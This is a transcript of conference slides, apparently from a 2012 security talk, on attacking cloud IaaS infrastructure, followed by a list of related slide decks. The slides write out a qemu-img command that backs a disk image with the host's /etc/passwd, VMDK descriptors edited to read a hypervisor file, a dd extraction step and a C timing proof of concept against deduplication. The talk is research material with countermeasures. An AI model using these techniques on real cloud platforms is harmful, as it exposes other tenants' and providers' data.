SlideShare une entreprise Scribd logo

NDH2k12 Cloud Computing Security

Matthieu Bouthors
Matthieu Bouthors

Cloud Computing Security presented at Nuit du Hack 2012

Technologie
1  sur  45
Télécharger pour lire hors ligne
Hacking Cloud Computing infrastructures for fun and for profit Matthieu BOUTHORS Wednesday, July 11, 12
Plan • Introduction to cloud computing • Focus on IaaS • Targeting data snapshots • Targeting data dedup 2 Wednesday, July 11, 12
* as a Service 3 Wednesday, July 11, 12
Characteristics • Agility / Elasticity : Everything could be scaled up/down • APIs : Everything could be automatized for more agility • Reliability / Low maintenance : sharing provide access to state-of-the-art architectures at low costs • Simplicity : Everything is divided in simple pieces (needed by previous points) 4 Wednesday, July 11, 12
Focus on IaaS • Orchestration from user to behind the OS : – Networking (Firewall rules, Elastic IPs, DNS, Load-Balancing, ... ) – Storage (RAW Volumes creation/deletion, Mounts, Snapshots, ...) – Hypervisor (VM lifecycle, sizing, RO access to COM Port, ...) • Sound likes something new and interesting 5 Wednesday, July 11, 12
IaaS stack 6 Wednesday, July 11, 12
Cloud Solutions • Custom orchestration other Xen/ Qemu-KVM hypervisor : AWS/ Rackspace/... • Closed source all-in-one solutions : VMWare (vsphere + cloud director), MS (Hyper-V + System Center) • Open source all-in-one solutions : OpenStack, Eucalyptus 7 Wednesday, July 11, 12
IaaS Hackers’ objectives • Almost unlimited network/compute/ storage resources for free • Access to IaaS customers’ sensitive piece of data • Access to IaaS customers’ VMs 8 Wednesday, July 11, 12
IaaS attack vectors • From the Internet – easiest to perform – limited attack surface – hard to find cloud specific vectors • Cloud APIs – Webservices available from all the Internet – Most secured part – Complete access to each IaaS functionality 9 Wednesday, July 11, 12
IaaS attack vectors • From a VM inside the cloud : – behind almost all conventional layers of defense – simple and RAW access to underneath resources – almost all tool / custom code could be used on the VM – restricted to public cloud 10 Wednesday, July 11, 12
“10$ Hack” principles • Pretend to be a legitimate customer • Spend a minimum of money thanks to elastic billing • Abuse a maximum of functionality only accessible to customers • Very effective against all provider with shared infrastructures 11 Wednesday, July 11, 12
Get close to the target • Thousands of physical hosts but you hope to be in the same as your target • Host is assignation is only algorithm tuned with different goals : – limit host under-utilization – provide constant performance among all the hosts – avoid capacity issues 12 Wednesday, July 11, 12
Abuse Host assignation • VMWare DRS : • spawn a lot of VMs and generate huge charge inside these VMs • VMs will be migrated to hosts with low usage • Stop generating load on VMs (VMs won’t be migrated but their hosts will be able to accept new busy VMs again) • Start DoS on targeted VMs • Targeted VMs will probably be migrated on a host where you already have a VM 13 Wednesday, July 11, 12
Attacking Storage 14 Wednesday, July 11, 12
Commonly used technologies • High performance NAS/SAN • Custom file format for RAW disks storage : – VMDK : VMWare – QED : qemu – TODO Hyper-V • Sometimes custom FS (VMWare VMFS) 15 Wednesday, July 11, 12
Snapshots • Users tends to create VM from only a few subset of images • Duplicating a RAW disk image on VM creation on each VM creation takes ages • Users need way to easily save RAW disk images • Snapshots solve these problems 16 Wednesday, July 11, 12
Snapshot principles • “Current” disk is marked as read only • New disk is created with the “current” disk as snapshot ancestor • New writes are performed on new disk • Reads are performed on new disk only if block has been re-writed since snapshot 17 Wednesday, July 11, 12
Exploiting snapshots • Control the value of the ancestor • Restore the snapshot • Read the content of the chosen ancestor 18 Wednesday, July 11, 12
qemu-kvm • anyfile can be used as an ancestor with standard qemu-img binary : • 19 $ qemu-img create -f qcow2 -b /etc/passwd nasty.qed $ strings nasty.qed /etc/passwd $ qemu-img convert -O raw nasty.qed nasty.raw && head -n 3 nasty.raw # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:*:0:0:Charlie &:/root:/usr/local/bin/bash Wednesday, July 11, 12
VMWare VMDK • No sexy tool like qemu-img • Virtual disk is usually separated into several .vmdk files • *-flat.vmdk files containing the raw data • .vmdk containing useful informations including the references to *-flat.vmdk files 20 Wednesday, July 11, 12
Normal .vmdk 21 # Disk DescriptorFile version=1 encoding="UTF-8" CID=b5892a19 parentCID=ffffffff isNativeSnapshot="no" createType="vmfs" # Extent description RW 33554432 VMFS "debian-test-flat.vmdk" # The Disk Data Base #DDB ddb.virtualHWVersion = "8" ddb.longContentID = "312b4792544af9a8c959d20eb5892a19" ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c" ddb.geometry.cylinders = "2088" ddb.geometry.heads = "255" ddb.geometry.sectors = "63" ddb.adapterType = "lsilogic" Wednesday, July 11, 12
Modifying the extends • Works with -flat.vmdk files from other disk images • Does not seems to work on local text files • Seems to work on local gz files 22 Wednesday, July 11, 12
.vmdk modified #1 23 # Disk DescriptorFile version=1 encoding="UTF-8" CID=b5892a19 parentCID=ffffffff isNativeSnapshot="no" createType="vmfs" # Extent description RW 33554432 VMFS "debian-test-flat.vmdk" RW 0 VMFS "debian-test_1-flat.vmdk" # The Disk Data Base #DDB ddb.virtualHWVersion = "8" ddb.longContentID = "312b4792544af9a8c959d20eb5892a19" ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c" ddb.geometry.cylinders = "2088" ddb.geometry.heads = "255" ddb.geometry.sectors = "63" ddb.adapterType = "lsilogic" Wednesday, July 11, 12
.vmdk modified #2 24 # Disk DescriptorFile version=1 encoding="UTF-8" CID=b5892a19 parentCID=ffffffff isNativeSnapshot="no" createType="vmfs" # Extent description RW 33554432 VMFS "debian-test-flat.vmdk" RW 0 VMFS "/bootbank/state.tgz" # The Disk Data Base #DDB ddb.virtualHWVersion = "8" ddb.longContentID = "312b4792544af9a8c959d20eb5892a19" ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c" ddb.geometry.cylinders = "2088" ddb.geometry.heads = "255" ddb.geometry.sectors = "63" ddb.adapterType = "lsilogic" Wednesday, July 11, 12
Retrieving data • Extend is accessible at the end of the disk device • We only have to skip the begining of the disk to retrieve the needed piece of data • In our case : 25 dd if=/dev/sda of=leaked_img skip=33554432 bs=512 25+0 records in 25+0 records out 12800 bytes transferred in 0.020000 secs (640001 bytes/sec) Wednesday, July 11, 12
Caveats • Hard to guess other VMs .vmdk filenames and paths • .gz are truncated to the closest multiple of 512 bytes 26 Wednesday, July 11, 12
Real-World attack possibilities • Unlikely to be able to forge these “snapshots” from API • Should be really useful when user is able to upload his own images 27 Wednesday, July 11, 12
Deduplication • Snapshot is not enough for optimizing storage usage • Filer (or file-systems like ZFS) provides deduplication of redundant blocks • Each time two redundant blocks are found, a block is replaced by a link • If a block is rewrited, the entire block need to be written 28 Wednesday, July 11, 12
Identify deduplication • If only one byte is written, all the deduplicated block needs to be written • Sounds like a write penalty • We will conduct timed attacks in order to identify this penalty 29 Wednesday, July 11, 12
Caveat #1 • Deduplication may be asynchronous • Attack needs to wait for the deduplication process to occurs • Since deduplication is only on the Filer, VM does not need to run waiting for deduplication, only volume need to remains during the wait 30 Wednesday, July 11, 12
Caveat #2 • Deduplication is filer-centric • Some filers work on NFS export at file level => no attack possible • Blocks may be misaligned between the VM Filesystem and the actual Filer => unlikely to be seen since this means a severe performance issue, the cloud provider will work for us and avoid this case 31 Wednesday, July 11, 12
Caveat #3 • OS / Filesytems Cache • Empty Linux cache before doing anything else • Use direct IO for writing 32 Wednesday, July 11, 12
What exploitation looks like • Create files that may be deduplicated and random files on your own VM • Wait (maybe 24 hours if dedup is a daily cron job) • Flush Linux file caches • Write one byte per block on each bloc (usually 4KB) • Compare timing on random files vs deduplicated files 33 Wednesday, July 11, 12
Flush Linux file cache • Cache behaviour of Linux unpredictable • we need a tool to show and flush Linux file cache • VMTouch is this tools (thx to hoytech) • https://github.com/hoytech/vmtouch 34 Wednesday, July 11, 12
Writes and time measurement • Avoiding python/ruby/java/... • Needs to use direct IOs • Needs to be far more precise than UNIX time command (ms precision) • Solution : simple C program 35 Wednesday, July 11, 12
.c POC 36 #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <time.h> #include <stdio.h> int64_t timespecDiff(struct timespec *timeA_p, struct timespec *timeB_p) { return ((timeA_p->tv_sec * 1000000000) + timeA_p->tv_nsec) - ((timeB_p->tv_sec * 1000000000) + timeB_p- >tv_nsec); } int main(int argc, char **argv) { int f; int t = "A"; f = open(argv[1], O_WRONLY | O_DIRECT); struct timespec start, end; clock_gettime(CLOCK_MONOTONIC, &start); write(f,&t,1); clock_gettime(CLOCK_MONOTONIC, &end); printf("%dn",timespecDiff(&end, &start)); close(f); return 0; } Wednesday, July 11, 12
Attacking ZFS dedup 37 Wednesday, July 11, 12
Limitations of this POC • Only focus on first block of a file • Lack of automation • Lack of block size guessing (needed in order to correct first limitation) 38 Wednesday, July 11, 12
Impacts / Counter-measure • Could be use to find if your cloud neighborhood have : • unpatched binaries on their VMs • files that belongs to you (dataleak detection) • Not limited to VMs, Provider may also have hypervisor’s data on the filer • Counter-measure : encrypt all your stuff in order to have different RAW blocks for same piece of data 39 Wednesday, July 11, 12
Corrupting dedup • Work In Progress : – generating a collision on dedup table – when user try to write legitimate file, they are deduped to your backdoored version • Difficulties : – Each Filer / Filesystem have is own checksum algorithm : you need to gather information about the storage infrastructure – Filer / Filesystems using weak checksum usually perform bit per bit comparaison before dedup (for instance NetApp) – Finding usable collision on strong checksum algorithm is really hard (for instance ZFS uses AES-256) 40 Wednesday, July 11, 12
Denial of Service via Dedup • Not tested yet • Only usable with solutions with weak checksum + bit-per-bit comparison • Attack scenario : – generate a maximum of collisions thanks to the weak algorithm 41 Wednesday, July 11, 12
Solutions : Provider side • Innovative solutions need to be security assessed more than usual • Internal security actions need to be publicly known and mesurable • Solutions : – internal skilled security teams – certifications and external audit policies 42 Wednesday, July 11, 12
Solutions : Customer/User side • Customer could not blindly trust any cloud provider • Counter-measures are available on customer side : – Avoid storing sensitive data unencrypted – Add firewall / IDS / IPS directly on VMs – Ensure the quality and reliability of the selected provider 43 Wednesday, July 11, 12
Conclusions • New technologies bring new threats • Other attacks available : • VM memory overlapping Host Memory (VMSA-2012-0009.2) • Xen SYSRET instruction (CVE-2012-0217) • ... • New threats does not always mean new way to fight these threats 44 Wednesday, July 11, 12
Questions ? • Thanks : @hackerzvoice & @outscale • Contacts : @majin_boo 45 CrashFR will never die in our living memories Wednesday, July 11, 12

Recommandé

XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...
XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...
XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...The Linux Foundation
 
Road show 2015 triangle meetup
Road show 2015 triangle meetupRoad show 2015 triangle meetup
Road show 2015 triangle meetupwim_provoost
 
LOAD BALANCING OF APPLICATIONS USING XEN HYPERVISOR
LOAD BALANCING OF APPLICATIONS USING XEN HYPERVISORLOAD BALANCING OF APPLICATIONS USING XEN HYPERVISOR
LOAD BALANCING OF APPLICATIONS USING XEN HYPERVISORVanika Kapoor
 
Open vStorage Meetup - Santa Clara 04/16
Open vStorage Meetup - Santa Clara 04/16Open vStorage Meetup - Santa Clara 04/16
Open vStorage Meetup - Santa Clara 04/16wim_provoost
 
S4 xen hypervisor_20080622
S4 xen hypervisor_20080622S4 xen hypervisor_20080622
S4 xen hypervisor_20080622Todd Deshane
 
Cloud Computing Hypervisors and Comparison Xen KVM
Cloud Computing Hypervisors and Comparison Xen KVM Cloud Computing Hypervisors and Comparison Xen KVM
Cloud Computing Hypervisors and Comparison Xen KVM cloudresearcher
 
Open vStorage Road show 2015 Q1
Open vStorage Road show 2015 Q1Open vStorage Road show 2015 Q1
Open vStorage Road show 2015 Q1wim_provoost
 
Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)
Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)
Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)Sandy Smith
 

Recommandé

XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...
XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...
XPDDS17: Virtualization at Huawei: Usage, Value-add and Challenges - Jinsong ...The Linux Foundation
 
Road show 2015 triangle meetup
Road show 2015 triangle meetupRoad show 2015 triangle meetup
Road show 2015 triangle meetupwim_provoost
 
LOAD BALANCING OF APPLICATIONS USING XEN HYPERVISOR
LOAD BALANCING OF APPLICATIONS USING XEN HYPERVISORLOAD BALANCING OF APPLICATIONS USING XEN HYPERVISOR
LOAD BALANCING OF APPLICATIONS USING XEN HYPERVISORVanika Kapoor
 
Open vStorage Meetup - Santa Clara 04/16
Open vStorage Meetup - Santa Clara 04/16Open vStorage Meetup - Santa Clara 04/16
Open vStorage Meetup - Santa Clara 04/16wim_provoost
 
S4 xen hypervisor_20080622
S4 xen hypervisor_20080622S4 xen hypervisor_20080622
S4 xen hypervisor_20080622Todd Deshane
 
Cloud Computing Hypervisors and Comparison Xen KVM
Cloud Computing Hypervisors and Comparison Xen KVM Cloud Computing Hypervisors and Comparison Xen KVM
Cloud Computing Hypervisors and Comparison Xen KVM cloudresearcher
 
Open vStorage Road show 2015 Q1
Open vStorage Road show 2015 Q1Open vStorage Road show 2015 Q1
Open vStorage Road show 2015 Q1wim_provoost
 
Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)
Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)
Architecting with Queues for Scale, Speed, and Separation (DCPHP 3/11/15)Sandy Smith
 
Turning OpenStack Swift into a VM storage platform
Turning OpenStack Swift into a VM storage platformTurning OpenStack Swift into a VM storage platform
Turning OpenStack Swift into a VM storage platformwim_provoost
 
GlusterFS w/ Tiered XFS
GlusterFS w/ Tiered XFS GlusterFS w/ Tiered XFS
GlusterFS w/ Tiered XFS Gluster.org
 
VM Live Migration Speedup in Xen
VM Live Migration Speedup in XenVM Live Migration Speedup in Xen
VM Live Migration Speedup in XenThe Linux Foundation
 
2017.06.19 Paul Woodward - ExploreVM VMware 101
2017.06.19 Paul Woodward - ExploreVM VMware 1012017.06.19 Paul Woodward - ExploreVM VMware 101
2017.06.19 Paul Woodward - ExploreVM VMware 101Paul Woodward Jr
 
Top Troubleshooting Tips and Techniques for Citrix XenServer Deployments
Top Troubleshooting Tips and Techniques for Citrix XenServer DeploymentsTop Troubleshooting Tips and Techniques for Citrix XenServer Deployments
Top Troubleshooting Tips and Techniques for Citrix XenServer DeploymentsDavid McGeough
 
12 christian ferber xen_server_advanced
12 christian ferber xen_server_advanced12 christian ferber xen_server_advanced
12 christian ferber xen_server_advancedDigicomp Academy AG
 
TechDay - Cambridge 2016 - OpenNebula Corona
TechDay - Cambridge 2016 - OpenNebula CoronaTechDay - Cambridge 2016 - OpenNebula Corona
TechDay - Cambridge 2016 - OpenNebula CoronaOpenNebula Project
 
Rmll Virtualization As Is Tool 20090707 V1.0
Rmll Virtualization As Is Tool 20090707 V1.0Rmll Virtualization As Is Tool 20090707 V1.0
Rmll Virtualization As Is Tool 20090707 V1.0guest72e8c1
 
Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Wellington Silva
 
Live VM Migration
Live VM MigrationLive VM Migration
Live VM MigrationShivam Singh
 
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCP
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCPOscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCP
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCPThe Linux Foundation
 
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case StudiesOpenNebula Project
 
Hyper-V vNext
Hyper-V vNextHyper-V vNext
Hyper-V vNextTomica Kaniski
 
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarry
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarryCeph, Xen, and CloudStack: Semper Melior-XPUS13 McGarry
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarryThe Linux Foundation
 
TECNIRIS@: OpenNebula Tutorial
TECNIRIS@: OpenNebula TutorialTECNIRIS@: OpenNebula Tutorial
TECNIRIS@: OpenNebula TutorialOpenNebula Project
 
vSphere APIs for performance monitoring
vSphere APIs for performance monitoringvSphere APIs for performance monitoring
vSphere APIs for performance monitoringAlan Renouf
 
Understanding PostgreSQL LW Locks
Understanding PostgreSQL LW LocksUnderstanding PostgreSQL LW Locks
Understanding PostgreSQL LW LocksJignesh Shah
 
Tech X Virtualization Tips
Tech X Virtualization TipsTech X Virtualization Tips
Tech X Virtualization TipsYoussef EL HADJ
 
Introduction to failover clustering with sql server
Introduction to failover clustering with sql serverIntroduction to failover clustering with sql server
Introduction to failover clustering with sql serverEduardo Castro
 
Instrumenting the real-time web: Node.js in production
Instrumenting the real-time web: Node.js in productionInstrumenting the real-time web: Node.js in production
Instrumenting the real-time web: Node.js in productionbcantrill
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing SecurityNithin Raj
 
Cloud Computing & Security
Cloud Computing & SecurityCloud Computing & Security
Cloud Computing & SecurityAwais Mansoor Chohan
 

Contenu connexe

Tendances

Turning OpenStack Swift into a VM storage platform
Turning OpenStack Swift into a VM storage platformTurning OpenStack Swift into a VM storage platform
Turning OpenStack Swift into a VM storage platformwim_provoost
 
GlusterFS w/ Tiered XFS
GlusterFS w/ Tiered XFS GlusterFS w/ Tiered XFS
GlusterFS w/ Tiered XFS Gluster.org
 
2017.06.19 Paul Woodward - ExploreVM VMware 101
2017.06.19 Paul Woodward - ExploreVM VMware 1012017.06.19 Paul Woodward - ExploreVM VMware 101
2017.06.19 Paul Woodward - ExploreVM VMware 101Paul Woodward Jr
 
Top Troubleshooting Tips and Techniques for Citrix XenServer Deployments
Top Troubleshooting Tips and Techniques for Citrix XenServer DeploymentsTop Troubleshooting Tips and Techniques for Citrix XenServer Deployments
Top Troubleshooting Tips and Techniques for Citrix XenServer DeploymentsDavid McGeough
 
12 christian ferber xen_server_advanced
12 christian ferber xen_server_advanced12 christian ferber xen_server_advanced
12 christian ferber xen_server_advancedDigicomp Academy AG
 
TechDay - Cambridge 2016 - OpenNebula Corona
TechDay - Cambridge 2016 - OpenNebula CoronaTechDay - Cambridge 2016 - OpenNebula Corona
TechDay - Cambridge 2016 - OpenNebula CoronaOpenNebula Project
 
Rmll Virtualization As Is Tool 20090707 V1.0
Rmll Virtualization As Is Tool 20090707 V1.0Rmll Virtualization As Is Tool 20090707 V1.0
Rmll Virtualization As Is Tool 20090707 V1.0guest72e8c1
 
Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Wellington Silva
 
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCP
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCPOscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCP
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCPThe Linux Foundation
 
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case StudiesOpenNebula Project
 
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarry
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarryCeph, Xen, and CloudStack: Semper Melior-XPUS13 McGarry
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarryThe Linux Foundation
 
TECNIRIS@: OpenNebula Tutorial
TECNIRIS@: OpenNebula TutorialTECNIRIS@: OpenNebula Tutorial
TECNIRIS@: OpenNebula TutorialOpenNebula Project
 
vSphere APIs for performance monitoring
vSphere APIs for performance monitoringvSphere APIs for performance monitoring
vSphere APIs for performance monitoringAlan Renouf
 
Understanding PostgreSQL LW Locks
Understanding PostgreSQL LW LocksUnderstanding PostgreSQL LW Locks
Understanding PostgreSQL LW LocksJignesh Shah
 
Tech X Virtualization Tips
Tech X Virtualization TipsTech X Virtualization Tips
Tech X Virtualization TipsYoussef EL HADJ
 
Introduction to failover clustering with sql server
Introduction to failover clustering with sql serverIntroduction to failover clustering with sql server
Introduction to failover clustering with sql serverEduardo Castro
 
Instrumenting the real-time web: Node.js in production
Instrumenting the real-time web: Node.js in productionInstrumenting the real-time web: Node.js in production
Instrumenting the real-time web: Node.js in productionbcantrill
 

Tendances (20)

Turning OpenStack Swift into a VM storage platform
Turning OpenStack Swift into a VM storage platformTurning OpenStack Swift into a VM storage platform
Turning OpenStack Swift into a VM storage platform
 
GlusterFS w/ Tiered XFS
GlusterFS w/ Tiered XFS GlusterFS w/ Tiered XFS
GlusterFS w/ Tiered XFS
 
VM Live Migration Speedup in Xen
VM Live Migration Speedup in XenVM Live Migration Speedup in Xen
VM Live Migration Speedup in Xen
 
2017.06.19 Paul Woodward - ExploreVM VMware 101
2017.06.19 Paul Woodward - ExploreVM VMware 1012017.06.19 Paul Woodward - ExploreVM VMware 101
2017.06.19 Paul Woodward - ExploreVM VMware 101
 
Top Troubleshooting Tips and Techniques for Citrix XenServer Deployments
Top Troubleshooting Tips and Techniques for Citrix XenServer DeploymentsTop Troubleshooting Tips and Techniques for Citrix XenServer Deployments
Top Troubleshooting Tips and Techniques for Citrix XenServer Deployments
 
12 christian ferber xen_server_advanced
12 christian ferber xen_server_advanced12 christian ferber xen_server_advanced
12 christian ferber xen_server_advanced
 
TechDay - Cambridge 2016 - OpenNebula Corona
TechDay - Cambridge 2016 - OpenNebula CoronaTechDay - Cambridge 2016 - OpenNebula Corona
TechDay - Cambridge 2016 - OpenNebula Corona
 
Rmll Virtualization As Is Tool 20090707 V1.0
Rmll Virtualization As Is Tool 20090707 V1.0Rmll Virtualization As Is Tool 20090707 V1.0
Rmll Virtualization As Is Tool 20090707 V1.0
 
Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)Docker from basics to orchestration (PHPConfBr2015)
Docker from basics to orchestration (PHPConfBr2015)
 
Live VM Migration
Live VM MigrationLive VM Migration
Live VM Migration
 
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCP
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCPOscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCP
Oscon 2012 : From Datacenter to the Cloud - Featuring Xen and XCP
 
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies
ISC Cloud 2013 - Cloud Architectures for HPC – Industry Case Studies
 
Hyper-V vNext
Hyper-V vNextHyper-V vNext
Hyper-V vNext
 
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarry
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarryCeph, Xen, and CloudStack: Semper Melior-XPUS13 McGarry
Ceph, Xen, and CloudStack: Semper Melior-XPUS13 McGarry
 
TECNIRIS@: OpenNebula Tutorial
TECNIRIS@: OpenNebula TutorialTECNIRIS@: OpenNebula Tutorial
TECNIRIS@: OpenNebula Tutorial
 
vSphere APIs for performance monitoring
vSphere APIs for performance monitoringvSphere APIs for performance monitoring
vSphere APIs for performance monitoring
 
Understanding PostgreSQL LW Locks
Understanding PostgreSQL LW LocksUnderstanding PostgreSQL LW Locks
Understanding PostgreSQL LW Locks
 
Tech X Virtualization Tips
Tech X Virtualization TipsTech X Virtualization Tips
Tech X Virtualization Tips
 
Introduction to failover clustering with sql server
Introduction to failover clustering with sql serverIntroduction to failover clustering with sql server
Introduction to failover clustering with sql server
 
Instrumenting the real-time web: Node.js in production
Instrumenting the real-time web: Node.js in productionInstrumenting the real-time web: Node.js in production
Instrumenting the real-time web: Node.js in production
 

En vedette

Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing SecurityNithin Raj
 
Cloud Computing and Security - by KLC Consulting
Cloud Computing and Security - by KLC ConsultingCloud Computing and Security - by KLC Consulting
Cloud Computing and Security - by KLC Consultingkylelai
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing Securitybudi rahardjo
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing SecurityAnshul Patel
 
Cloud Computing : Security and Forensics
Cloud Computing : Security and ForensicsCloud Computing : Security and Forensics
Cloud Computing : Security and ForensicsGovind Maheswaran
 
Analysis of-security-algorithms-in-cloud-computing [autosaved]
Analysis of-security-algorithms-in-cloud-computing [autosaved]Analysis of-security-algorithms-in-cloud-computing [autosaved]
Analysis of-security-algorithms-in-cloud-computing [autosaved]Md. Fazla Rabbi
 
Cloud computing security
Cloud computing security Cloud computing security
Cloud computing security Akhila Param
 
AWS Webcast - Understanding the AWS Security Model
AWS Webcast - Understanding the AWS Security ModelAWS Webcast - Understanding the AWS Security Model
AWS Webcast - Understanding the AWS Security ModelAmazon Web Services
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing SecurityDhaval Dave
 
Security Issues of Cloud Computing
Security Issues of Cloud ComputingSecurity Issues of Cloud Computing
Security Issues of Cloud ComputingFalgun Rathod
 
Data storage security in cloud computing
Data storage security in cloud computingData storage security in cloud computing
Data storage security in cloud computingSonali Jain
 
Data security in cloud computing
Data security in cloud computingData security in cloud computing
Data security in cloud computingPrince Chandu
 
Cloud computing security from single to multiple
Cloud computing security from single to multipleCloud computing security from single to multiple
Cloud computing security from single to multipleKiran Kumar
 

En vedette (17)

Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing Security
 
Cloud Computing & Security
Cloud Computing & SecurityCloud Computing & Security
Cloud Computing & Security
 
Cloud Computing and Security - by KLC Consulting
Cloud Computing and Security - by KLC ConsultingCloud Computing and Security - by KLC Consulting
Cloud Computing and Security - by KLC Consulting
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing Security
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing Security
 
Cloud Computing & Security Concerns
Cloud Computing & Security ConcernsCloud Computing & Security Concerns
Cloud Computing & Security Concerns
 
Cloud Computing : Security and Forensics
Cloud Computing : Security and ForensicsCloud Computing : Security and Forensics
Cloud Computing : Security and Forensics
 
Analysis of-security-algorithms-in-cloud-computing [autosaved]
Analysis of-security-algorithms-in-cloud-computing [autosaved]Analysis of-security-algorithms-in-cloud-computing [autosaved]
Analysis of-security-algorithms-in-cloud-computing [autosaved]
 
Cloud computing security
Cloud computing security Cloud computing security
Cloud computing security
 
Security in cloud computing
Security in cloud computingSecurity in cloud computing
Security in cloud computing
 
Cloud computing security
Cloud computing securityCloud computing security
Cloud computing security
 
AWS Webcast - Understanding the AWS Security Model
AWS Webcast - Understanding the AWS Security ModelAWS Webcast - Understanding the AWS Security Model
AWS Webcast - Understanding the AWS Security Model
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing Security
 
Security Issues of Cloud Computing
Security Issues of Cloud ComputingSecurity Issues of Cloud Computing
Security Issues of Cloud Computing
 
Data storage security in cloud computing
Data storage security in cloud computingData storage security in cloud computing
Data storage security in cloud computing
 
Data security in cloud computing
Data security in cloud computingData security in cloud computing
Data security in cloud computing
 
Cloud computing security from single to multiple
Cloud computing security from single to multipleCloud computing security from single to multiple
Cloud computing security from single to multiple
 

Similaire à NDH2k12 Cloud Computing Security

Building A Scalable Open Source Storage Solution
Building A Scalable Open Source Storage SolutionBuilding A Scalable Open Source Storage Solution
Building A Scalable Open Source Storage SolutionPhil Cryer
 
Gluster intro-tdose
Gluster intro-tdoseGluster intro-tdose
Gluster intro-tdoseGluster.org
 
Gluster intro-tdose
Gluster intro-tdoseGluster intro-tdose
Gluster intro-tdoseGluster.org
 
Building the Enterprise infrastructure with PostgreSQL as the basis for stori...
Building the Enterprise infrastructure with PostgreSQL as the basis for stori...Building the Enterprise infrastructure with PostgreSQL as the basis for stori...
Building the Enterprise infrastructure with PostgreSQL as the basis for stori...PavelKonotopov
 
Embedded Linux Basics
Embedded Linux BasicsEmbedded Linux Basics
Embedded Linux BasicsMarc Leeman
 
Why Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container TechnologyWhy Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container TechnologySagi Brody
 
Big Data in Container; Hadoop Spark in Docker and Mesos
Big Data in Container; Hadoop Spark in Docker and MesosBig Data in Container; Hadoop Spark in Docker and Mesos
Big Data in Container; Hadoop Spark in Docker and MesosHeiko Loewe
 
Software defined storage
Software defined storageSoftware defined storage
Software defined storageGluster.org
 
MesosCon EU 2017 - Criteo - Operating Mesos-based Infrastructures
MesosCon EU 2017 - Criteo - Operating Mesos-based InfrastructuresMesosCon EU 2017 - Criteo - Operating Mesos-based Infrastructures
MesosCon EU 2017 - Criteo - Operating Mesos-based Infrastructurespierrecdn -
 
Running Oracle EBS in the cloud (DOAG TECH17 edition)
Running Oracle EBS in the cloud (DOAG TECH17 edition)Running Oracle EBS in the cloud (DOAG TECH17 edition)
Running Oracle EBS in the cloud (DOAG TECH17 edition)Andrejs Prokopjevs
